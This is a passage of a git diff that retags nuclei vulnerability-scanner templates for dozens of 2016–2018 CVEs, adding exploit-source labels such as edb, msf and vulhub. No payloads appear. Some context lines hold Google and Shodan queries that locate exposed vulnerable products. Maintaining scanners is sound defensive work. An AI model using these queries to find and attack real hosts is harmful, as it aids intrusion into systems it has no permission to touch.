method: GET diff --git a/config/nuclei-templates/cves/2016/CVE-2016-10924.yaml b/config/nuclei-templates/cves/2016/CVE-2016-10924.yaml index b9ce12e9d..92b0c3f94 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-10924.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-10924.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-22 metadata: google-query: inurl:"/wp-content/plugins/ebook-download" - tags: cve,cve2016,wp-plugin,lfi,wordpress,ebook,wp + tags: cve,wordpress,edb,cve2016,wp-plugin,lfi,ebook,wp,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2016/CVE-2016-10940.yaml b/config/nuclei-templates/cves/2016/CVE-2016-10940.yaml index 3898a7c31..d08288843 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-10940.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-10940.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.2 cve-id: CVE-2016-10940 cwe-id: CWE-89 - tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated + tags: wpscan,cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2016/CVE-2016-1555.yaml b/config/nuclei-templates/cves/2016/CVE-2016-1555.yaml index 6d21d11d1..a5a30ece6 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-1555.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-1555.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2016-1555 cwe-id: CWE-77 - tags: cve,cve2016,netgear,rce,oast,router,kev + tags: netgear,rce,oast,router,kev,seclists,cve,cve2016 requests: - raw: diff --git a/config/nuclei-templates/cves/2016/CVE-2016-2004.yaml b/config/nuclei-templates/cves/2016/CVE-2016-2004.yaml index fc2306739..15ec090ed 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-2004.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-2004.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2016-2004 cwe-id: CWE-306 - tags: cve,cve2016,network,iot,hp,rce + tags: cve,cve2016,network,iot,hp,rce,edb network: - inputs: diff --git a/config/nuclei-templates/cves/2016/CVE-2016-2389.yaml b/config/nuclei-templates/cves/2016/CVE-2016-2389.yaml index 856a9a419..11dff6429 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-2389.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-2389.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-22 metadata: shodan-query: http.favicon.hash:-266008933 - tags: cve,cve2016,lfi,sap + tags: lfi,sap,packetstorm,edb,cve,cve2016 requests: - method: GET diff --git a/config/nuclei-templates/cves/2016/CVE-2016-3088.yaml b/config/nuclei-templates/cves/2016/CVE-2016-3088.yaml index 8b313a218..7ec53a97b 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-3088.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-3088.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2016-3088 cwe-id: CWE-20 - tags: cve,cve2016,apache,activemq,fileupload,kev + tags: fileupload,kev,edb,cve,cve2016,apache,activemq requests: - raw: diff --git a/config/nuclei-templates/cves/2016/CVE-2016-3978.yaml b/config/nuclei-templates/cves/2016/CVE-2016-3978.yaml index cb1763470..eb558a984 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-3978.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-3978.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2016-3978 cwe-id: CWE-79 - tags: cve,cve2016,redirect,fortinet,fortios + tags: cve2016,redirect,fortinet,fortios,seclists,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2016/CVE-2016-4977.yaml b/config/nuclei-templates/cves/2016/CVE-2016-4977.yaml index 48ee87dc3..2b7d032e7 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-4977.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-4977.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.8 cve-id: CVE-2016-4977 cwe-id: CWE-19 - tags: cve,cve2016,spring,oauth2,oauth,rce,ssti + tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring requests: - method: GET diff --git a/config/nuclei-templates/cves/2016/CVE-2016-5649.yaml b/config/nuclei-templates/cves/2016/CVE-2016-5649.yaml index 6940b6d48..91a192e91 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-5649.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-5649.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2016-5649 cwe-id: CWE-200 - tags: cve,cve2016,iot,netgear,router + tags: cve,cve2016,iot,netgear,router,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2016/CVE-2016-7552.yaml b/config/nuclei-templates/cves/2016/CVE-2016-7552.yaml index bc1439cc1..df8f83ffc 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-7552.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-7552.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2016-7552 cwe-id: CWE-22 - tags: cve,cve2016,lfi,auth,bypass + tags: msf,cve,cve2016,lfi,auth,bypass requests: - method: GET diff --git a/config/nuclei-templates/cves/2016/CVE-2016-8527.yaml b/config/nuclei-templates/cves/2016/CVE-2016-8527.yaml index 4ef5b7d55..32a3f7acc 100644 --- a/config/nuclei-templates/cves/2016/CVE-2016-8527.yaml +++ b/config/nuclei-templates/cves/2016/CVE-2016-8527.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 - tags: cve,cve2016,aruba,xss + tags: cve2016,aruba,xss,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-0929.yaml b/config/nuclei-templates/cves/2017/CVE-2017-0929.yaml index 0a684e02b..78f216197 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-0929.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-0929.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2017-0929 cwe-id: CWE-918 - tags: cve,cve2017,oast,ssrf,dnn,dotnetnuke + tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-1000028.yaml b/config/nuclei-templates/cves/2017/CVE-2017-1000028.yaml index 2402b889a..0695b8517 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-1000028.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-1000028.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000028 cwe-id: CWE-22 - tags: cve,cve2017,oracle,glassfish,lfi + tags: oracle,glassfish,lfi,edb,cve,cve2017 requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-1000170.yaml b/config/nuclei-templates/cves/2017/CVE-2017-1000170.yaml index 11b34208a..fe5f26d39 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-1000170.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-1000170.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2017-1000170 cwe-id: CWE-22 - tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery + tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm requests: - method: POST diff --git a/config/nuclei-templates/cves/2017/CVE-2017-10271.yaml b/config/nuclei-templates/cves/2017/CVE-2017-10271.yaml index 0ebec2558..dd344c542 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-10271.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-10271.yaml @@ -15,7 +15,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2017-10271 - tags: cve,cve2017,rce,oracle,weblogic,oast,kev + tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-10974.yaml b/config/nuclei-templates/cves/2017/CVE-2017-10974.yaml index c26f3a00e..52ff2715d 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-10974.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-10974.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2017-10974 cwe-id: CWE-22 - tags: cve,cve2017,yaws,lfi + tags: edb,cve,cve2017,yaws,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-11512.yaml b/config/nuclei-templates/cves/2017/CVE-2017-11512.yaml index c9b0076fc..047cf7480 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-11512.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-11512.yaml @@ -20,7 +20,7 @@ info: metadata: shodan-query: http.title:"ManageEngine" verified: "true" - tags: cve,cve2017,manageengine,lfr,unauth + tags: cve,cve2017,manageengine,lfr,unauth,tenable requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-11610.yaml b/config/nuclei-templates/cves/2017/CVE-2017-11610.yaml index 9c8eb3199..ac5a9f54d 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-11610.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-11610.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-276 metadata: shodan-query: http.title:"Supervisor Status" - tags: cve,cve2017,rce,supervisor,oast,xmlrpc + tags: oast,xmlrpc,msf,cve,cve2017,rce,supervisor requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-12149.yaml b/config/nuclei-templates/cves/2017/CVE-2017-12149.yaml index 201ac3614..a9cd3220d 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-12149.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-12149.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12149 cwe-id: CWE-502 - tags: cve,cve2017,jboss,java,rce,deserialization,kev + tags: java,rce,deserialization,kev,vulhub,cve,cve2017,jboss requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-12542.yaml b/config/nuclei-templates/cves/2017/CVE-2017-12542.yaml index 9bd0b6ab7..22e1e6690 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-12542.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-12542.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-12542 - tags: cve,cve2017,ilo4,hpe,auth-bypass + tags: ilo4,hpe,auth-bypass,edb,cve,cve2017 requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-12615.yaml b/config/nuclei-templates/cves/2017/CVE-2017-12615.yaml index 7b679f8a3..1c9fedf98 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-12615.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-12615.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-434 metadata: shodan-query: title:"Apache Tomcat" - tags: cve,cve2017,apache,rce,tomcat,kev,cisa + tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache requests: - method: PUT diff --git a/config/nuclei-templates/cves/2017/CVE-2017-12629.yaml b/config/nuclei-templates/cves/2017/CVE-2017-12629.yaml index ea0227d45..bab23dc8e 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-12629.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-12629.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - tags: cve,cve2017,solr,apache,oast,xxe + tags: oast,xxe,vulhub,cve,cve2017,solr,apache requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-14135.yaml b/config/nuclei-templates/cves/2017/CVE-2017-14135.yaml index 3f7e57637..7fdc2e846 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-14135.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-14135.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-78 metadata: shodan-query: title:"Dreambox WebControl" - tags: cve,cve2017,dreambox,rce,oast + tags: cve2017,dreambox,rce,oast,edb,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-14535.yaml b/config/nuclei-templates/cves/2017/CVE-2017-14535.yaml index b11674388..330df119b 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-14535.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-14535.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.8 cve-id: CVE-2017-14535 cwe-id: CWE-78 - tags: cve,cve2017,trixbox,rce,injection + tags: cve,cve2017,trixbox,rce,injection,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-15287.yaml b/config/nuclei-templates/cves/2017/CVE-2017-15287.yaml index 144181dec..916b9a90a 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-15287.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-15287.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2017-15287 cwe-id: CWE-79 - tags: cve,cve2017,xss,dreambox + tags: dreambox,edb,cve,cve2017,xss requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-15363.yaml b/config/nuclei-templates/cves/2017/CVE-2017-15363.yaml index 61e9d12ce..796d80f4f 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-15363.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-15363.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2017-15363 cwe-id: CWE-22 - tags: cve,cve2017,restler,lfi + tags: cve,cve2017,restler,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-15647.yaml b/config/nuclei-templates/cves/2017/CVE-2017-15647.yaml index d0a33eaa1..c996105f8 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-15647.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-15647.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2017-15647 cwe-id: CWE-22 - tags: cve,cve2017,lfi,router + tags: lfi,router,edb,cve,cve2017 requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-15715.yaml b/config/nuclei-templates/cves/2017/CVE-2017-15715.yaml index 1a7acc0b7..8b2236d45 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-15715.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-15715.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.1 cve-id: CVE-2017-15715 cwe-id: CWE-20 - tags: cve,cve2017,apache,httpd,fileupload + tags: apache,httpd,fileupload,vulhub,cve,cve2017 requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-15944.yaml b/config/nuclei-templates/cves/2017/CVE-2017-15944.yaml index 9b2c00fdd..48d1b07c6 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-15944.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-15944.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-15944 - tags: cve,cve2017,rce,vpn,panos,globalprotect,kev + tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-16806.yaml b/config/nuclei-templates/cves/2017/CVE-2017-16806.yaml index 2a15ee382..56a9e56ab 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-16806.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-16806.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2017-16806 cwe-id: CWE-22 - tags: cve,cve2017,ulterius,traversal + tags: cve2017,ulterius,traversal,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-17043.yaml b/config/nuclei-templates/cves/2017/CVE-2017-17043.yaml index 270810d1f..e50a8de23 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-17043.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-17043.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17043 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin + tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-17059.yaml b/config/nuclei-templates/cves/2017/CVE-2017-17059.yaml index 7eafb7127..a2e97ad00 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-17059.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-17059.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17059 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin + tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress requests: - method: POST diff --git a/config/nuclei-templates/cves/2017/CVE-2017-17451.yaml b/config/nuclei-templates/cves/2017/CVE-2017-17451.yaml index 12a7be0ec..643729ab6 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-17451.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-17451.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17451 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin + tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-17562.yaml b/config/nuclei-templates/cves/2017/CVE-2017-17562.yaml index a9e580364..2bb55101f 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-17562.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-17562.yaml @@ -17,7 +17,7 @@ info: cvss-score: 8.1 cve-id: CVE-2017-17562 cwe-id: CWE-20 - tags: cve,cve2017,rce,goahead,fuzz,kev + tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-18024.yaml b/config/nuclei-templates/cves/2017/CVE-2017-18024.yaml index 589f7a310..dc40bd3e8 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-18024.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-18024.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18024 cwe-id: CWE-79 - tags: cve,cve2017,xss,avantfax + tags: avantfax,hackerone,packetstorm,cve,cve2017,xss requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-18536.yaml b/config/nuclei-templates/cves/2017/CVE-2017-18536.yaml index 49b8bf9be..4d105ea3b 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-18536.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-18536.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18536 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin + tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-18598.yaml b/config/nuclei-templates/cves/2017/CVE-2017-18598.yaml index 8ead93494..974e3f8ba 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-18598.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-18598.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18598 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast + tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-3506.yaml b/config/nuclei-templates/cves/2017/CVE-2017-3506.yaml index d55a76f60..aeb8965d5 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-3506.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-3506.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 7.4 cve-id: CVE-2017-3506 - tags: cve,cve2017,weblogic,oracle,rce,oast + tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-3528.yaml b/config/nuclei-templates/cves/2017/CVE-2017-3528.yaml index 8b9c4aefb..f4756f09b 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-3528.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-3528.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.4 cve-id: CVE-2017-3528 cwe-id: CWE-601 - tags: cve,cve2017,oracle,redirect + tags: oracle,redirect,edb,cve,cve2017 requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-3881.yaml b/config/nuclei-templates/cves/2017/CVE-2017-3881.yaml index a39583d42..12e351f92 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-3881.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-3881.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2017-3881 cwe-id: CWE-20 - tags: cve,cve2017,cisco,rce,network,kev + tags: cve2017,cisco,rce,network,kev,msf,cve network: - inputs: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-5487.yaml b/config/nuclei-templates/cves/2017/CVE-2017-5487.yaml index 210dcde79..d33e90763 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-5487.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-5487.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.component:"WordPress" verified: "true" - tags: cve,cve2017,wordpress,wp + tags: cve,cve2017,wordpress,wp,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-5631.yaml b/config/nuclei-templates/cves/2017/CVE-2017-5631.yaml index 82310879d..d8e29efb2 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-5631.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-5631.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - tags: cve,cve2017,xss,caseaware + tags: edb,cve,cve2017,xss,caseaware requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-5638.yaml b/config/nuclei-templates/cves/2017/CVE-2017-5638.yaml index ddc4c505e..5da6dbb20 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-5638.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-5638.yaml @@ -15,7 +15,7 @@ info: cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 - tags: cve,cve2017,struts,rce,apache,kev + tags: apache,kev,msf,cve,cve2017,struts,rce requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-5982.yaml b/config/nuclei-templates/cves/2017/CVE-2017-5982.yaml index 6048ef26d..0332b376c 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-5982.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-5982.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2017-5982 cwe-id: CWE-98 - tags: cve,cve2017,kodi,lfi + tags: cve2017,kodi,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-6090.yaml b/config/nuclei-templates/cves/2017/CVE-2017-6090.yaml index 4507bd49d..d57c1b1ab 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-6090.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-6090.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-434 metadata: shodan-query: http.title:"PhpCollab" - tags: cve,cve2017,phpcollab,rce,fileupload + tags: cve2017,phpcollab,rce,fileupload,edb,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2017/CVE-2017-7615.yaml b/config/nuclei-templates/cves/2017/CVE-2017-7615.yaml index 497efb6a3..4181cd4b7 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-7615.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-7615.yaml @@ -22,7 +22,7 @@ info: cvss-score: 8.8 cve-id: CVE-2017-7615 cwe-id: CWE-640 - tags: cve,cve2017,mantisbt,unauth + tags: cve,cve2017,mantisbt,unauth,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2017/CVE-2017-9833.yaml b/config/nuclei-templates/cves/2017/CVE-2017-9833.yaml index 2f8c595a7..e1896d066 100644 --- a/config/nuclei-templates/cves/2017/CVE-2017-9833.yaml +++ b/config/nuclei-templates/cves/2017/CVE-2017-9833.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2017-9833 cwe-id: CWE-22 - tags: boa,lfr,lfi,cve,cve2017 + tags: boa,lfr,lfi,cve,cve2017,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-0296.yaml b/config/nuclei-templates/cves/2018/CVE-2018-0296.yaml index 3ca5ed1aa..32101da09 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-0296.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-0296.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-0296 cwe-id: CWE-22 - tags: cve,cve2018,cisco,lfi,traversal,asa,kev + tags: edb,cve,cve2018,cisco,lfi,traversal,asa,kev requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-1000533.yaml b/config/nuclei-templates/cves/2018/CVE-2018-1000533.yaml index 75553411a..491d39117 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-1000533.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-1000533.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000533 cwe-id: CWE-20 - tags: rce,git,cve,cve2018,gitlist + tags: git,cve,cve2018,gitlist,vulhub,rce requests: - raw: diff --git a/config/nuclei-templates/cves/2018/CVE-2018-1000861.yaml b/config/nuclei-templates/cves/2018/CVE-2018-1000861.yaml index 4ad62c300..8cc0cd05b 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-1000861.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-1000861.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - tags: cve,cve2018,jenkin,rce,jenkins,kev + tags: kev,vulhub,cve,cve2018,jenkin,rce,jenkins requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-10093.yaml b/config/nuclei-templates/cves/2018/CVE-2018-10093.yaml index 757224c46..91998154b 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-10093.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-10093.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10093 cwe-id: CWE-862 - tags: cve,cve2018,rce,iot,audiocode + tags: cve,cve2018,rce,iot,audiocode,edb,seclists requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-10201.yaml b/config/nuclei-templates/cves/2018/CVE-2018-10201.yaml index f5b143ea9..9cd2c826a 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-10201.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-10201.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10201 cwe-id: CWE-22 - tags: cve,cve2018,ncomputing,lfi + tags: cve2018,ncomputing,lfi,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-10822.yaml b/config/nuclei-templates/cves/2018/CVE-2018-10822.yaml index 64b8bf0b3..540bebad4 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-10822.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-10822.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10822 cwe-id: CWE-22 - tags: cve,cve2018,lfi,router,dlink + tags: dlink,edb,seclists,cve,cve2018,lfi,router requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-10823.yaml b/config/nuclei-templates/cves/2018/CVE-2018-10823.yaml index f9dca9457..cc30f6ea5 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-10823.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-10823.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10823 cwe-id: CWE-78 - tags: cve,cve2018,rce,iot,dlink,router + tags: cve2018,rce,iot,dlink,router,edb,seclists,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-10956.yaml b/config/nuclei-templates/cves/2018/CVE-2018-10956.yaml index 3a17bc733..1de95f138 100644 --- a/config/nuclei-templates/cves/2018/CVE-2018-10956.yaml +++ b/config/nuclei-templates/cves/2018/CVE-2018-10956.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-22 metadata: shodan-query: http.title:"Orchid Core VMS" - tags: cve,cve2018,orchid,vms,lfi + tags: cve,cve2018,orchid,vms,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2018/CVE-2018-11409.yaml b/config/nuclei-templates/cves/2018/CVE-2018-11409.yaml index 66fdf09e6..b0e5756e8 100644 